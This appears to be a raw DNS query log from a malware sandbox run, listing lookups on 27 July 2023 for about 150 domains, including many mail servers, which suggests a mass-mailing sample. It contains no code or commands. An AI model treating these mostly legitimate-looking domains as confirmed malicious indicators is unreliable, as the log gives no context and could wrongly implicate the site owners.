                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.807481050 CEST8.8.8.8192.168.2.40xb221No error (0)assideum.com52.219.84.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.807481050 CEST8.8.8.8192.168.2.40xb221No error (0)assideum.com52.219.100.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.807481050 CEST8.8.8.8192.168.2.40xb221No error (0)assideum.com52.219.104.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.807481050 CEST8.8.8.8192.168.2.40xb221No error (0)assideum.com52.219.92.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.807481050 CEST8.8.8.8192.168.2.40xb221No error (0)assideum.com52.219.104.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.807481050 CEST8.8.8.8192.168.2.40xb221No error (0)assideum.com52.219.103.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.807481050 CEST8.8.8.8192.168.2.40xb221No error (0)assideum.com52.219.107.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.814477921 CEST8.8.8.8192.168.2.40xd3c5No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.840007067 CEST8.8.8.8192.168.2.40xf1b7No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.869254112 CEST8.8.8.8192.168.2.40xc556No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.870965958 CEST8.8.8.8192.168.2.40x6c43No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.870965958 CEST8.8.8.8192.168.2.40x6c43No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.893697977 CEST8.8.8.8192.168.2.40x3031No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.914545059 CEST8.8.8.8192.168.2.40xc616No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.922621012 CEST8.8.8.8192.168.2.40x1c26No error (0)alt4.gmail-smtp-in.l.google.com142.250.157.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.927340984 CEST8.8.8.8192.168.2.40xb1f6No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.954709053 CEST8.8.8.8192.168.2.40xbe1fNo error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.963072062 CEST8.8.8.8192.168.2.40x78adNo error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.964678049 CEST8.8.8.8192.168.2.40x15dNo error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.973239899 CEST8.8.8.8192.168.2.40xcf95No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.000521898 CEST8.8.8.8192.168.2.40x1bb1No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.006598949 CEST8.8.8.8192.168.2.40xdc3fNo error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.009572983 CEST8.8.8.8192.168.2.40x67b6No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.023066998 CEST8.8.8.8192.168.2.40xa45No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.040513039 CEST8.8.8.8192.168.2.40x31f1No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.046127081 CEST8.8.8.8192.168.2.40x3182No error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.046127081 CEST8.8.8.8192.168.2.40x3182No error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.046127081 CEST8.8.8.8192.168.2.40x3182No error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.046127081 CEST8.8.8.8192.168.2.40x3182No error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.046127081 CEST8.8.8.8192.168.2.40x3182No error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.046127081 CEST8.8.8.8192.168.2.40x3182No error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.046766996 CEST8.8.8.8192.168.2.40x81d1No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.074352026 CEST8.8.8.8192.168.2.40xe3cbName error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.095796108 CEST8.8.8.8192.168.2.40xb008No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.113126040 CEST8.8.8.8192.168.2.40x9723No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.113148928 CEST8.8.8.8192.168.2.40xcf36No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.142237902 CEST8.8.8.8192.168.2.40xd9deNo error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.203176022 CEST8.8.8.8192.168.2.40xb9aNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.230501890 CEST8.8.8.8192.168.2.40x6819No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.242471933 CEST8.8.8.8192.168.2.40xa5bdNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.246690989 CEST8.8.8.8192.168.2.40xf6a5No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.297821999 CEST8.8.8.8192.168.2.40x37e4No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.299870014 CEST8.8.8.8192.168.2.40xe325No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.306694984 CEST8.8.8.8192.168.2.40xfb0eNo error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.306694984 CEST8.8.8.8192.168.2.40xfb0eNo error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.313657045 CEST8.8.8.8192.168.2.40xb475Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.317169905 CEST8.8.8.8192.168.2.40xcc0bNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.340780020 CEST8.8.8.8192.168.2.40xa14aNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.350893021 CEST8.8.8.8192.168.2.40x62f3No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.395796061 CEST8.8.8.8192.168.2.40xd2cNo error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.404508114 CEST8.8.8.8192.168.2.40x823fNo error (0)alt4.gmail-smtp-in.l.google.com142.250.157.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.427025080 CEST8.8.8.8192.168.2.40xde22No error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.427025080 CEST8.8.8.8192.168.2.40xde22No error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.443545103 CEST8.8.8.8192.168.2.40x9d8eNo error (0)yhsll.com102.134.49.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.454881907 CEST8.8.8.8192.168.2.40x9dc8No error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.460648060 CEST8.8.8.8192.168.2.40xee49No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.464492083 CEST8.8.8.8192.168.2.40xf666No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.464492083 CEST8.8.8.8192.168.2.40xf666No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.465734959 CEST8.8.8.8192.168.2.40x3d71No error (0)sigtoa.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.465734959 CEST8.8.8.8192.168.2.40x3d71No error (0)sigtoa.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.477958918 CEST8.8.8.8192.168.2.40xb832Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.502697945 CEST8.8.8.8192.168.2.40x72b4No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.502697945 CEST8.8.8.8192.168.2.40x72b4No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.502697945 CEST8.8.8.8192.168.2.40x72b4No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.502697945 CEST8.8.8.8192.168.2.40x72b4No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.509263992 CEST8.8.8.8192.168.2.40x892No error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.509263992 CEST8.8.8.8192.168.2.40x892No error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.509263992 CEST8.8.8.8192.168.2.40x892No error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.509263992 CEST8.8.8.8192.168.2.40x892No error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.509263992 CEST8.8.8.8192.168.2.40x892No error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.509263992 CEST8.8.8.8192.168.2.40x892No error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.520670891 CEST8.8.8.8192.168.2.40x3974No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.528209925 CEST8.8.8.8192.168.2.40xccb2Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.533868074 CEST8.8.8.8192.168.2.40x74dNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.560977936 CEST8.8.8.8192.168.2.40x8283No error (0)hyab.se188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.560977936 CEST8.8.8.8192.168.2.40x8283No error (0)hyab.se188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.581778049 CEST8.8.8.8192.168.2.40x293Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.585073948 CEST8.8.8.8192.168.2.40xadd6No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.606151104 CEST8.8.8.8192.168.2.40x9f0cNo error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.665883064 CEST8.8.8.8192.168.2.40x23dcNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.801187992 CEST8.8.8.8192.168.2.40x8b5No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.802903891 CEST8.8.8.8192.168.2.40x462bNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.819324970 CEST8.8.8.8192.168.2.40x5ea4No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.846323013 CEST8.8.8.8192.168.2.40x82e5No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.846323013 CEST8.8.8.8192.168.2.40x82e5No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.850925922 CEST8.8.8.8192.168.2.40xeaa4No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.852184057 CEST8.8.8.8192.168.2.40x5984No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.861452103 CEST8.8.8.8192.168.2.40xc57bNo error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.861452103 CEST8.8.8.8192.168.2.40xc57bNo error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.872889996 CEST8.8.8.8192.168.2.40xa6a1No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.872889996 CEST8.8.8.8192.168.2.40xa6a1No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.872889996 CEST8.8.8.8192.168.2.40xa6a1No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.878201008 CEST8.8.8.8192.168.2.40x606eNo error (0)onzcda.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.878201008 CEST8.8.8.8192.168.2.40x606eNo error (0)onzcda.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.881356955 CEST8.8.8.8192.168.2.40x3094Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.885888100 CEST8.8.8.8192.168.2.40xb173No error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.899122000 CEST8.8.8.8192.168.2.40xb76bNo error (0)diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.916843891 CEST8.8.8.8192.168.2.40xdab9Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.918622971 CEST8.8.8.8192.168.2.40xc4f5No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.918622971 CEST8.8.8.8192.168.2.40xc4f5No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.929614067 CEST8.8.8.8192.168.2.40x66ccNo error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.938780069 CEST8.8.8.8192.168.2.40xc3bcNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.947796106 CEST8.8.8.8192.168.2.40x2e4cNo error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.951240063 CEST8.8.8.8192.168.2.40x69ecNo error (0)araax.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.951240063 CEST8.8.8.8192.168.2.40x69ecNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.951240063 CEST8.8.8.8192.168.2.40x69ecNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.951240063 CEST8.8.8.8192.168.2.40x69ecNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.951281071 CEST8.8.8.8192.168.2.40x9d9eName error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.994374037 CEST8.8.8.8192.168.2.40x467aName error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.004640102 CEST8.8.8.8192.168.2.40x4200No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.042821884 CEST8.8.8.8192.168.2.40x82a8No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.042821884 CEST8.8.8.8192.168.2.40x82a8No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.163942099 CEST8.8.8.8192.168.2.40x6325No error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.192676067 CEST8.8.8.8192.168.2.40x3d31No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.192676067 CEST8.8.8.8192.168.2.40x3d31No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.219856977 CEST8.8.8.8192.168.2.40xe63fNo error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.270143032 CEST8.8.8.8192.168.2.40x784cNo error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.270143032 CEST8.8.8.8192.168.2.40x784cNo error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.314534903 CEST8.8.8.8192.168.2.40x82e0No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.316435099 CEST8.8.8.8192.168.2.40xa72dNo error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.344638109 CEST8.8.8.8192.168.2.40x4c55No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.472810984 CEST8.8.8.8192.168.2.40x781cNo error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.528330088 CEST8.8.8.8192.168.2.40xc6b7No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.583679914 CEST8.8.8.8192.168.2.40xe9adNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.596683025 CEST8.8.8.8192.168.2.40xca10No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.604465008 CEST8.8.8.8192.168.2.40x3a2dNo error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.674170971 CEST8.8.8.8192.168.2.40xc4a0No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.717530966 CEST8.8.8.8192.168.2.40xdb03No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.743416071 CEST8.8.8.8192.168.2.40x9c18No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.759140015 CEST8.8.8.8192.168.2.40x185eNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.766997099 CEST8.8.8.8192.168.2.40x84e0No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.766997099 CEST8.8.8.8192.168.2.40x84e0No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.805752993 CEST8.8.8.8192.168.2.40x6da5No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.830797911 CEST8.8.8.8192.168.2.40x236fNo error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.830797911 CEST8.8.8.8192.168.2.40x236fNo error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.842911005 CEST8.8.8.8192.168.2.40x24cfName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.847209930 CEST8.8.8.8192.168.2.40xb2adNo error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.880211115 CEST8.8.8.8192.168.2.40x4687Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.913161039 CEST8.8.8.8192.168.2.40x80d2Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.942616940 CEST8.8.8.8192.168.2.40x833cNo error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.942616940 CEST8.8.8.8192.168.2.40x833cNo error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.942616940 CEST8.8.8.8192.168.2.40x833cNo error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.956450939 CEST8.8.8.8192.168.2.40x5d56No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.969744921 CEST8.8.8.8192.168.2.40x67ddNo error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.995013952 CEST8.8.8.8192.168.2.40x762eNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.027606010 CEST8.8.8.8192.168.2.40x95f5No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.038666964 CEST8.8.8.8192.168.2.40x8551No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.038666964 CEST8.8.8.8192.168.2.40x8551No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.047157049 CEST8.8.8.8192.168.2.40x7c89No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.049854994 CEST8.8.8.8192.168.2.40x3965No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.055939913 CEST8.8.8.8192.168.2.40x61faNo error (0)umcor.am188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.055939913 CEST8.8.8.8192.168.2.40x61faNo error (0)umcor.am188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.060395956 CEST8.8.8.8192.168.2.40xd2e1No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.062509060 CEST8.8.8.8192.168.2.40x51b7No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.064342022 CEST8.8.8.8192.168.2.40x762eNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.071432114 CEST8.8.8.8192.168.2.40x35fbNo error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.071432114 CEST8.8.8.8192.168.2.40x35fbNo error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.083524942 CEST8.8.8.8192.168.2.40xcc0aNo error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.083995104 CEST8.8.8.8192.168.2.40x4dbeNo error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.101032019 CEST8.8.8.8192.168.2.40xbc1eNo error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.118931055 CEST8.8.8.8192.168.2.40xdd81No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
